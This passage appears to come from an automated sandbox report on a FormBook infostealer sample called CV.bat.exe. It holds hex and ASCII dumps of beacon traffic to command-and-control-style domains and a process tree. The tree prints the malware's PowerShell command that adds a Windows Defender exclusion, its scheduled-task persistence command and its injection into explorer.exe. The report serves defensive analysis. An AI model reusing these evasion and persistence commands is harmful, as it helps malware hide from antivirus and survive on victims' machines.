42 62 72 6b 76 4c 7a 63 52 55 38 67 55 7a 72 43 32 7a 70 77 37 6e 48 6e 73 67 67 73 58 6b 35 77 4c 4a 70 6d 50 32 53 64 33 5a 74 58 7a 4a 6e 52 78 34 55 70 4f 71 54 6d 74 64 6e 57 69 52 7a 4a 58 35 70 73 67 75 38 68 7a 62 71 6c 63 70 69 67 37 56 54 49 6e 6a 56 6f 69 66 59 66 46 67 52 37 61 31 71 63 2d 61 31 63 46 76 50 44 69 37 56 36 34 50 68 45 55 59 61 6c 46 72 37 6b 53 52 56 77 78 33 38 79 53 41 74 59 30 67 4b 79 4c 68 45 39 75 54 42 34 48 71 59 39 4b 61 64 51 46 7a 38 34 2d 57 39 52 4b 42 67 74 4b 37 2d 33 7a 41 6f 39 6f 6f 34 51 59 62 33 79 6a 6c 49 61 49 58 45 41 47 6f 63 6b 70 7e 35 79 33 63 79 39 4b 42 5a 57 38 4a 30 4a 69 66 6f 28 6d 76 6c 66 6b 51 52 7e 73 65 73 72 70 37 47 49 31 6c 6b 71 54 33 4e 51 50 51 6b 79 67 5a 62 72 4f 4c 53 6b 38 4c 57 49 61 6a 7a 6c 4c 4c 35 52 79 48 41 54 76 35 6d 73 49 5a 4a 37 56 34 39 34 68 55 58 50 4c 35 4a 33 67 51 4e 32 57 79 59 33 48 31 32 72 62 71 44 67 30 4e 6d 78 6d 7e 6e 31 68 5a 5a 4a 62 51 54 70 36 5a 46 75 36 4b 39 48 59 6d 51 75 38 30 39 73 4b 31 53 7a 38 48 59 38 6e 58 49 41 46 7e 4e 39 33 64 4e 33 39 49 67 42 39 68 4b 4c 31 4d 76 36 6c 54 64 66 75 56 4d 4e 6a 50 34 49 49 79 4a 51 51 42 66 6e 35 53 65 49 41 62 7a 72 61 42 65 6d 48 67 67 37 66 33 6b 34 5a 34 47 5a 54 52 42 43 31 43 33 6a 69 35 57 28 73 34 4f 51 65 51 69 6d 45 4c 6e 6f 44 55 76 69 4b 4d 4b 59 30 43 6c 78 47 57 52 68 47 50 47 63 4a 65 69 61 38 46 63 6b 51 41 4e 5a 4f 7e 4b 54 33 6d 48 31 50 7a 59 75 49 4b 58 4d 73 63 62 77 41 54 64 66 32 52 49 35 75 41 61 39 49 6f 67 66 48 49 6a 53 4b 59 43 28 58 41 6e 35 76 36 63 30 6e 4b 39 6d 71 5a 45 56 7a 54 38 65 6a 53 65 64 61 38 34 67 43 67 4b 78 44 73 45 66 43 4d 56 51 63 7e 41 76 4c 48 57 57 6a 61 64 32 52 66 49 35 52 41 32 47 33 4b 50 59 73 31 4b 63 77 62 4d 37 4f 57 6e 36 58 32 5a 52 4f 48 5a 4a 42 37 6c 77 4c 38 78 48 4f 58 47 45 51 39 7a 37 37 5a 4d 28 69 6c 6f 6c 44 4d 6c 45 58 65 6f 31 6e 64 32 6c 75 68 77 45 67 66 58 Data Ascii: WvMH=hQCvjyR4iH7W7cj7WwzEmg3ye23N(XgthsXiVcTAdeRMV2JVA_d_flaB2fAjtOfWS-Vmp8uTtC4gVN~fUlbag-oX1xsTsd3ORHFzi3oXehcQiUH39BdLhtgS4jt4dSKhNKzKI57KqhfL~82oe6818fjx4oU4tofB362HfxYlUalBiMb6ZbVlkLG1Y8aV3BfGnYJs4RbWniJ1Dt4OmaA2qlPmyWBtEeygkYJmqplfUQU0I_AwxuZAvYa6evb1dFIeP3cjpG2-10vS3-wUETUQD_hWUeyIEVSy8vLHh0YrqCQ3aFeJLxOxJJ8dWxeW779UecXhJtWTqv8ex2drKcD-NfjdLxQ5gslKXi1OXKQSlihqWfzvNtoQo6DlCQAmSTDKhCNW08562t~TUWBkTWWgF3c-GOxie4iyEpfyZd8d91icec3KlBtO0m2f1BhVjunqXg1-1GL5e0ksP92alii6NzBl7C9elJ(iSKhMdsbiWZuOpTLKW6wC7CMJRlid~PsYug50pgN54RZ5FweclN631yMoryAH67u-nl8AxQ481aVahGqSj4WgiPZfttUoGfoLgv0ihkWQNuTTHA9DQOY72smNtah59EpH~rCHPu0fvs~iaC02bmOx1CiGaJslkfegXg42RVghcUWaaToTRU7dXwG7P2vuOzXW7lnfNq3TwRkVeAG-PFakoVxaXH3f3iRp~wMUN2KAgAXFAU1BbrkvLzcRU8gUzrC2zpw7nHnsggsXk5wLJpmP2Sd3ZtXzJnRx4UpOqTmtdnWiRzJX5psgu8hzbqlcpig7VTInjVoifYfFgR7a1qc-a1cFvPDi7V64PhEUYalFr7kSRVwx38ySAtY0gKyLhE9uTB4HqY9KadQFz84-W9RKBgtK7-3zAo9oo4QYb3yjlIaIXEAGockp~5y3cy9KBZW8J0Jifo(mvlfkQR~sesrp7GI1lkqT3NQPQkygZbrOLSk8LWIajzlLL5RyHATv5msIZJ7V494hUXPL5J3gQN2WyY3H12rbqDg0Nmxm~n1hZZJbQTp6ZFu6K9HYmQu809sK1Sz8HY8nXIAF~N93dN39IgB9hKL1Mv6lTdfuVMNjP4IIyJQQBfn5SeIAbzraBemHgg7f3k4Z4GZTRBC1C3ji5W(s4OQeQimELnoDUviKMKY0ClxGWRhGPGcJeia8FckQANZO~KT3mH1PzYuIKXMscbwATdf2RI5uAa9IogfHIjSKYC(XAn5v6c0nK9mqZEVzT8ejSeda84gCgKxDsEfCMVQc~AvLHWWjad2RfI5RA2G3KPYs1KcwbM7OWn6X2ZROHZJB7lwL8xHOXGEQ9z77ZM(ilolDMlEXeo1nd2luhwEgfXn0M-OG2y0c~fpTgjtIGbjkwv8us0FJzi0t5O4EvdSR3p(-T7m91xSm1iDRnqixo270bAVhfvjua-uISwxiyzbi9Vbi1LBrv2UlbP3gyKvvSb~YYz(_36fIJmEl3Nc30FLrmn~A8nMsJtXvf-80N2aE9JPGrabBan5PrV8BHhKX8nWJvpJKQNt2BSFTs5Al(ERctjqfMaL3psTh4L9WyX2F6ZS8jGvEwfki1AKOmZK_Ll3G2kP8nXG5oXeVRcFDteTUWO(ZQRurF5N-qhIpXLrm4dGZeEEnKJtyF50sVwua5xuPtcwUt9iW9FwnCTm1MQIFdugJnIdtQ3~DYPPPwOItCBA0u6O4~k2z7km8rGmVpdFnbAO9poAy4fMis6svNBTcEDxKX1RcICiNxrh83rmXkqO945RXZn7vwVtdGn~eanoaRih1pENxtT0YtO4e1zbpBLtSBjUCxg0fHRYcCgPZOX1QSBQYs1Q3azuZ(v6HDk529caTpx9CeePbc_hJAVTntN3hiJtEwgSC9ecsfE5CK64-Tpgm6DsucsoNz_3A1qPvvi0nRI6Z6C57N_1Nckhb8cQcS853pIa8UonIOUZdq7o7UW3n84R4Tns_DQFB6o2OmeJ6k2chpqDl~wpNLZktA3oJaInPX0XJEUo3JqL6sxtBsRENI1sk13VBvdenFtmzuFVjMXAJO6Xhj8f_LcR-B26xMpVLas3WkdlAggC_DMyUJUTxUAb-kWg64IePqByI9u7G3EQw5hApZKzmS1Pa5c1ebPWXLYRDPI6axo~0J8EUADvggBqfbHEy92A309r1dRCGKMKa6n(0tl3-nVXSpNyOrdjY5_qHo44SLjSvKl~7vA59e6N2Di~ndKwy5cM14CpPWPY2MlM-LHYmR5ooaX0f4WMDyNXYkrKsrfoPSX5RfdHgGpFKDcIupaq1j6mlRkz-YdA2ZjYnSPLBIbTP8BhyB3cDiCqhQEv6gZXdannxDkbFoTtUAHtfKJifXxAc(HBR8BDBsVMCMC7iAF1QJGmMY7qWS5utmQMtrPxmciTssrB0(DbBBxkJVC4mkq71SKePRaU034S2(1sEuuhwaa02zRqzaNNo3ofAWQsAQA~XTZY3U6JJN_5tmGZYPCVvyC9o9JJcn65nPnmK9vpw88bgHrnk(Y8ehKTToAC8HAyYkGMXDdOLfinZZknrjkFR1BG6ZPoyEP4qsYWRha2aS844AsOTifHznpW8nll0ttqHTrmYcQKr614pfb6NqlyzpJ3ZpeMMaxTLKJQ8saWZM6TKUJ(kxaVyGauPRffXa11FvCyde-8xszjQGCqmPszHRyFeGU(0dYusj1GDl7y4aV88j_X22qAAruqHqnDDSYJANmBahbWy2FtBx-lsqKBdNducs5gls4(kfxNDLeRQLaOsI4FgnBEGQLxT75HyWts7TzGop31RweFZ6RkQw_VVh0lWFvZkKqcBxaQggql5g2JAbC~lfpgymAzus_e_xsFglHzA3Q0o661qDvG4aT4iHWzPguX6hBMRnidVD8iUIS9ZfEOYNbJM3kFePOLFgpWjeVf6l3rFZOEjqeCMiAMiWK~5vDvIYJmchOPduD88doKEiHljm2qat72t(61bZQaDip35NeEFo-v3fFJdJQXcDGJeVypkIWOcy7wShSlfL1BGlbSs1n(jniwyJgNvjMWcpBmDZ4PhSsn0qrfrLiADkoum0mOUFqlaBRng1jewYnCEIsb9wOsAPd~n6v2a(RlCpkftfbJ3qFqXAphB0HWH(iOv9x(aN8VZDmG9kgupxKggntITptEvkPOsGtFf6vmbZLkZiMbcYdg00925kN7i8XKTPtaq4x2Zx9AKjnKLIsGd56S6zq9aB8qVWS8_1_SnXuOffj63cOr3bnO5CHwnrbcjoKn4Rl6l2NmkVWjDZGj5qd2j7xlCAJ~kLxnpwKINOsA2Cthkiim-1cfr5Rz7lQUznATtxR8MSQj6eP0vXPlbMN29HbG5toGuFxSgWX45Vp3ZHbbkfQ1o5DBIZMEEDyD-e59e79Cymry74AQ1ylbiiZs1NX6Xw_WtzJZq0XxL1_aLRvpWLA7Na5tFeOuRMcugaDsFH0(XJNtVx2SNPREkZ3eOFNfGRl8eXiC3WJUr14lLjyPnibjTe2Fr3jU2ppdDBfbc8kuMODz_ByBKL3NGn8IeDugsjr(etT80s09nS4IYvUQ2khwW85lwW-e18xrID_v0lm326ENUViMCC1l7bNH0JjUxAeLdOfcUkPlP7ZGOwqLq77LNz-UF2t5pbTD3Z896fnaixUMys85f8dywoiwzWOZKakwRXXqO9gPIjPq2aZP5UggCPMGQdAqmKdfNm-nulKhUPG7n5aKLPG2dRzSMwN60XC~9o5rG~72yTylXGIsCYBmcURi9jhleh0GmkK2Pg3uOLLq0feuyrFuKYpO4flaxtmIeLBaoavIjXCI-z4jS0SSrNDeHECmE1huziJ9jmV3QWqYNO0Q6ZB(WIpCTJ83hBi1GA5u3UXiUspBA0o0-3-m4IH~eTrFqn-OO~iejVv3vVtQMlIpCln3iVnIbeuk5kXmj27D5sz~XigHrZrPCbbKQDYL_sxGSpZp-4EYXaFnj1f2W25gn9rHGsZ6PUA3ymrWD0_UYkvNRxYw6FHpn~vbgksVzwsRhXRV1fZjGkcf8IPCurlbpFetI40gLnfLkMlo1jUrZ~kq2wFJ-CoGA9
Oct 3, 2022 15:57:30.616703987 CEST	125	IN	HTTP/1.1 403 Forbidden date: Mon, 03 Oct 2022 13:57:30 GMT content-type: text/html transfer-encoding: chunked vary: Accept-Encoding server: NginX content-encoding: gzip connection: close Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49706	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:32.636440039 CEST	126	OUT	GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== HTTP/1.1 Host: www.yaignars.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 3, 2022 15:57:32.693151951 CEST	127	IN	HTTP/1.1 200 OK date: Mon, 03 Oct 2022 13:57:32 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.9 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_DNc5on43OHnGVS4ditvRZB7RSHdQuUQcDBHC8yKwg/0kAkdj4QFY9/C5VurcMo8s4/LO5foN7oDXqPsQU3hMcQ== last-modified: Mon, 03 Oct 2022 13:57:32 GMT x-cache-miss-from: parking-7f9f948885-4zk47 server: NginX connection: close Data Raw: 32 44 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 44 4e 63 35 6f 6e 34 33 4f 48 6e 47 56 53 34 64 69 74 76 52 5a 42 37 52 53 48 64 51 75 55 51 63 44 42 48 43 38 79 4b 77 67 2f 30 6b 41 6b 64 6a 34 51 46 59 39 2f 43 35 56 75 72 63 4d 6f 38 73 34 2f 4c 4f 35 66 6f 4e 37 6f 44 58 71 50 73 51 55 33 68 4d 63 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 79 61 69 67 6e 61 72 73 2e 73 69 74 65 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 79 61 69 67 6e 61 72 73 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 79 61 69 67 6e 61 72 73 2e 73 69 74 65 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 Data Ascii: 2D0<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_DNc5on43OHnGVS4ditvRZB7RSHdQuUQcDBHC8yKwg/0kAkdj4QFY9/C5VurcMo8s4/LO5foN7oDXqPsQU3hMcQ==><head><meta charset="utf-8"><title>yaignars.site - Informationen zum Thema yaignars.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="yaignars.site ist die beste Quelle fr alle Informationen die Sie suchen. Von allgemeinen Themen bis hin zu
Oct 3, 2022 15:57:32.693193913 CEST	128	IN	Data Raw: 20 73 70 65 7a 69 65 6c 6c 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 20 53 69 65 20 61 75 66 20 79 61 69 67 6e 61 72 73 2e 73 69 74 65 20 61 6c 6c 65 73 2e 20 57 69 72 20 68 6f 66 66 65 6e 2c 20 64 61 73 73 20 53 69 Data Ascii: speziellen Sachverhalten, finden Sie auf yaignars.site alles. Wir hoffen, dass Sie hier das Gesuchte findeAECn!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style
Oct 3, 2022 15:57:32.693223000 CEST	130	IN	Data Raw: 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d Data Ascii: ay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visibl
Oct 3, 2022 15:57:32.693272114 CEST	131	IN	Data Raw: 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 Data Ascii: y{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0
Oct 3, 2022 15:57:32.693298101 CEST	132	IN	Data Raw: 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 Data Ascii: //img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:
Oct 3, 2022 15:57:32.693330050 CEST	133	IN	Data Raw: 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 62 75 79 62 6f 78 7b 64 69 73 70 6c Data Ascii: erline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{
Oct 3, 2022 15:57:32.693355083 CEST	134	IN	Data Raw: 31 35 44 38 0d 0a 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 62 75 74 74 6f 6e 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b Data Ascii: 15D8.container-searchbox__button{cursor:pointer;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__co
Oct 3, 2022 15:57:32.693378925 CEST	136	IN	Data Raw: 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 Data Ascii: interactive-text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:
Oct 3, 2022 15:57:32.693417072 CEST	137	IN	Data Raw: 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 Data Ascii: 218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hov
Oct 3, 2022 15:57:32.693453074 CEST	138	IN	Data Raw: 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 Data Ascii: -family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript">
Oct 3, 2022 15:57:32.714293957 CEST	140	IN	Data Raw: 5a 44 31 33 64 33 63 75 65 57 46 70 5a 32 35 68 63 6e 4d 75 63 32 6c 30 5a 54 59 7a 4d 32 46 6c 59 54 52 6a 59 54 45 34 4d 6d 51 34 4c 6a 55 31 4e 54 63 32 4f 54 63 31 4a 6e 52 68 63 32 73 39 63 32 56 68 63 6d 4e 6f 4a 6d 52 76 62 57 46 70 62 6a Data Ascii: ZD13d3cueWFpZ25hcnMuc2l0ZTYzM2FlYTRjYTE4MmQ4LjU1NTc2OTc1JnRhc2s9c2VhcmNoJmRvbWFpbj15YWlnbmFycy5zaXRlJmFfaWQ9MyZzZXNzaW9uPWdPUmt5d1BMMU9kN0YwM25fNG1G","postActionParameter":{"feedback":"/search/fb.php?ses=","token":{"pageLoaded":"eb094bd6740ba8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CV.bat.exePID: 6056, Parent PID: 3452

General

Target ID:	0
Start time:	15:55:23
Start date:	03/10/2022
Path:	C:\Users\user\Desktop\CV.bat.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\CV.bat.exe
Imagebase:	0x430000
File size:	885760 bytes
MD5 hash:	40372D67F0DE4526F04FBA7948F7FF02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5156, Parent PID: 6056

General

Target ID:	1
Start time:	15:55:34
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Imagebase:	0xa00000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5152, Parent PID: 5156

General

Target ID:	2
Start time:	15:55:35
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5148, Parent PID: 6056

General

Target ID:	3
Start time:	15:55:35
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp
Imagebase:	0x1a0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5908, Parent PID: 5148

General

Target ID:	5
Start time:	15:55:35
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: CV.bat.exePID: 5060, Parent PID: 6056

General

Target ID:	8
Start time:	15:55:42
Start date:	03/10/2022
Path:	C:\Users\user\Desktop\CV.bat.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\CV.bat.exe
Imagebase:	0x780000
File size:	885760 bytes
MD5 hash:	40372D67F0DE4526F04FBA7948F7FF02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 5060

General

Target ID:	13
Start time:	15:55:46
Start date:	03/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chkdsk.exePID: 1264, Parent PID: 3452

General

Target ID:	17
Start time:	15:56:34
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x1200000
File size:	23040 bytes
MD5 hash:	2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
